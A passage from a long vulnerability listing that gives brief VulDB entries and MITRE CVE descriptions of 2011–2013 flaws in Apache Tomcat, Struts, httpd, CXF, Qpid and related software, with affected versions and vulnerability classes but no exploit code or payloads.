4693| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
4694| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
4695| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
4696| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
4697| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
4698| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
4699| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
4700| [36225] XAMPP Apache Distribution 1.6.0a sql injection
4701| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
4702| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
4703| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
4704| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
4705| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
4706| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
4707| [34252] Apache HTTP Server denial of service
4708| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
4709| [33877] Apache Opentaps 0.9.3 cross site scripting
4710| [33876] Apache Open For Business Project unknown vulnerability
4711| [33875] Apache Open For Business Project cross site scripting
4712| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid memory corruption
4713| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
4714|
4715| MITRE CVE - https://cve.mitre.org:
4716| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
4717| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
4718| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
4719| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
4720| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
4721| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
4722| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
4723| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
4724| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
4725| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
4726| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
4727| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
4728| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
4729| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
4730| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
4731| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
4732| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
4733| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
4734| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
4735| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
4736| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
4737| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
4738| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
4739| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
4740| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
4741| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not property implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
4742| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
4743| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
4744| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
4745| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
4746| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
4747| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
4748| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
4749| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
4750| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
4751| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
4752| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
4753| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
4754| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
4755| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
4756| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
4757| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
4758| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
4759| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
4760| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
4761| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
4762| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
4763| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
4764| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
4765| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
4766| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
4767| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
4768| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
4769| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
4770| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
4771| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
4772| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
4773| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
4774| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
4775| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
4776| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
4777| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
4778| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
4779| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
4780| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
4781| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
4782| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
4783| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
4784| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
4785| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
4786| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
4787| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
4788| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
4789| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
4790| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
4791| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
4792| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
